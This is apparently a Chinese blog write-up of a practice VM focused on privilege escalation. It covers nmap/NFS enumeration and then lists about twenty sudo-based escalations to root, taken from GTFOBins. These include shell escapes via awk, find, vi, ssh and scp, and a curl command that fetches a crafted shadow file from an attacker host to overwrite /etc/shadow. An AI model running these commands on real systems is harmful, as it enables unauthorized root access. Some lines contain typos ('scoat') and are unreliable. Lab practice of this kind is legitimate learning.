文章讲述了在靶机上进行信息收集,通过nmap发现NFS服务并尝试挂载共享目录。在未能直接获取有效信息后,作者参考网上的writeup找到了初始立足点——bob/secret。接着,文章详细列举了多种利用sudo权限进行提权的方法,包括使用/bin/bash,/usr/bin/awk,curl,/bin/ed等,以及提权时需要注意的备份或快照重要文件的建议。
1、信息收集和getshell
下载靶机的时候没看描述,开启靶机直接盲打。
直接开局四部曲--开放端口扫描,开放端口服务扫描,nmap简单漏洞脚本扫描,发现nfs服务开启,立即showmount -e 看有哪些共享目录
在kali创建temp目录把靶机共享目录挂载上去,进去啥有效信息也没得,也不能写入文件。然后退出一直找啊找啊也没找到,最终承认自己是个菜逼,到网上搜靶机的writeup才发现作者已经给了初始立足点,这是一台练习提权的靶机!!!!!!!
初始立足点:bob/secret
2、提权
sudo -l 看有哪些root执行权限
直接参考gtfobins进行提权:GTFOBins
建议和B站UP主<<红队笔记>>最近更新的sudo提权视频一起食用,味道更加哦。
【「红队笔记」Linux提权精讲:Sudo风暴 - Sudo风暴第1部分,扫地僧级别心法,研究提权技术的同时,打磨你对linux内核的深度理解。渗透测试宝典。-哔哩哔哩】 https://b23.tv/4T9afh9
1、/bin/ash,/bin/bash, /bin/sh, /bin/csh, /usr/bin/curl, /bin/dash,提权
sudo /bin/sh
sudo /bin/ash
sudo /bin/bash
sudo /bin/csh
sudo /bin/dash
sudo /usr/bin/zsh
2、/usr/bin/awk提权
sudo awk 'BEGIN { system('/bin/bash')}'
3、curl提权
curl有个-o参数可以将返回报文保存到文件中,提权原理就是使用curl命令获取自定义的shadow文件将靶机上的/etc/shadow覆盖。
在kali使用mkpass生成算法为sha-512,密码为123456的密文, 然后参考root的格式创建文件,kali打开python简易http服务供靶机下载
注:进行以下操作前先对/etc/shadow进行备份或者对虚拟机进行快照!!!!!
靶机上进行curl http://192.168.62.156:9999/shadow_to_replace -o /etc/shadow
然后su - root,输入明文123456即可切换到root
4、/bin/ed提权
ed是一个类似vi的编辑器
sudo /bin/ed
!/bin/bash
5、/usr/bin/env提权
sudo env /bin/bash
6、expect提权
sudo expect -c "spawn /bin/bash;interact"
7、find 提权
sudo find . -exec /bin/sh \; -quit
8、ftp提权
sudo ftp
!/bin/bash
9、less提权
sudo less file
进入命令行后输入!/bin/bash,回车新起一个bash
10、man提权
sudo man man
!/bin/bash
11、more提权
12、scp提权
TF=$(mktemp)
echo 'sh 0<&2 1>&2' > $TF
chmod +x "$TF"
sudo scp -S $TF x y:
13、socat提权
sudo scoat stdin exec:/bin/sh
14、ssh提权
sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x
15、vi提权
sudo vi -c ':!/bin/sh' /dev/null
16 pico提权
sudo pico 会出现这个页面
按ctrl+R 会出现:
按ctrl+X,出现
然后输入
reset; sh 1>&0 2>&0 回车,发现权限已经提升至root
17 rvim提权
-
This requires that
rvimis compiled with Python support. Prepend:py3for Python 3.sudo rvim -c ':py import os; os.execl("/bin/sh", "sh", "-c", "reset; exec sh")' -
This requires that
rvimis compiled with Lua support.sudo rvim -c ':lua os.execute("reset; exec sh")'
(我执行的时候说这个版本不支持)
18、perl提权
sudo perl -e 'exec "/bin/sh";'
19、git提权
有abcde五种方法,我这里使用了第二种
sudo git -p help config
!/bin/sh
20、tclsh提权
sudo tclsh
exec /bin/sh <@stdin >@stdout 2>@stderr
21、script提权
sudo script -q /dev/null
suid的提权文件也有好多,各为就自己探索吧~
扫一扫
8253
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
